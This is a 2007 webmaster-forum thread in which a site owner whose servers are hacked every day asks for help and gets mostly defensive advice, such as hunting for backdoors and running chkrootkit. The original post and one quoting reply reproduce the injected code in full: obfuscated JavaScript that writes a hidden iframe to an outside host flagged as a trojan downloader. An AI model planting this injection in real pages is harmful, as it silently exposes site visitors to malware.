I'm getting hacked daily! Need Help!

**romper** · December 4th, 2007, 06:45 PM

Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
<SCRIPT>
s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
</SCRIPT>
But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
Thanks

**AmateurFlix** · December 4th, 2007, 07:01 PM

FYI I got the following warning just from visiting your signup page in your sig:

Trojan-Downloader.JS.Agent.kd
http://58.65.234.9/~momo/traffic/index.php

Hope you get it fixed soon man, your sites were a great resource to set up trades with. I assume this hack is why you closed the signup pages

**romper** · December 4th, 2007, 07:27 PM

Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
I know about the webmasters page. It's getting in everywhere.

**The Professional** · December 4th, 2007, 07:32 PM

what happened to me might have been different... but you might want to check out this thread
http://www.askdamagex.com/t21776-we-...urity-now.html

there is another one kicking around.. but if I were you ... start with taking the exploit out of your templates... and then chmod'ing them to 444 (read-only)

**romper** · December 4th, 2007, 08:26 PM

Thanks, but i already saw that post. It's not the same.

I have had my templates at 444 for several months because of the last time I got hacked. I don't find any scripts in my template files. that's what is so confusing. I don't know where it is coming from.

**FrozenJag** · December 4th, 2007, 08:29 PM

Maybe talk to boneless? I know comus had some troubles with getting hacked awhile back didnt they? Maybe he could help.

**Papillon** · December 4th, 2007, 09:33 PM

uggg what a PITA

hope you sort this out romper

**willwank** · December 5th, 2007, 12:08 AM

Originally Posted by romper

Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
I know about the webmasters page. It's getting in everywhere.

I saw google had flagged one of your sites "unsafe" to visit. Might come from these issues you have going with this fucker(s)?

**SEOVivian** · December 5th, 2007, 01:32 AM

i recommend you to get AVAST is a very good antivirus.

good luck

**willwank** · December 5th, 2007, 01:44 AM

Originally Posted by SEOVivian

i recommend you to get AVAST is a very good antivirus.

good luck

Now there's a great answer

**Pornonada** · December 5th, 2007, 03:27 AM

Originally Posted by romper

Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
<SCRIPT>
s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
</SCRIPT>
But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
Thanks

They have for sure installed a backdoor already, until you find that file(s) whatever you do is worthless...

**Tatiana** · December 5th, 2007, 03:38 AM

I recommend you to get system administrator.

**Fuckin Bill** · December 5th, 2007, 07:29 AM

http://www.chkrootkit.org/

Try downloading and running that on your server. It's a little old, but it checks for a shitload of stuff and does it pretty quickly.

Make sure you read the documentation though, some things can cause a false positive.

**digifan** · December 5th, 2007, 07:57 AM

And a safe server never hurts

**romper** · December 5th, 2007, 10:09 AM

Thanks guys! I will let you know when i figure this out. that chkrootkit looks like it might be worth a shot. What I need is a server Guru if anyone knows a god for hire.

**tolik** · December 5th, 2007, 10:19 AM

Originally Posted by willwank

Now there's a great answer

answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.

**willwank** · December 5th, 2007, 10:34 AM

Originally Posted by tolik

answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

**tolik** · December 5th, 2007, 10:50 AM

Originally Posted by willwank

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

well i had problem with one similar virus with keyloger etc built-in (as i found from info about this virus) and only avast at paranoidal level helped me. all other antiviruses etc does not show anything.

**boneless** · December 5th, 2007, 12:26 PM

sounds to me that the first hack left them with a backdoor on the box, could also be outdated server software.

any word from webair on what might cause it? any logfiles they got on the box that might be of help?

**benito** · December 5th, 2007, 12:36 PM

Originally Posted by willwank

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

Only if they use windows...

Thread: I'm getting hacked daily! Need Help!

Thread Tools

I'm getting hacked daily! Need Help!

my advice

Posting Permissions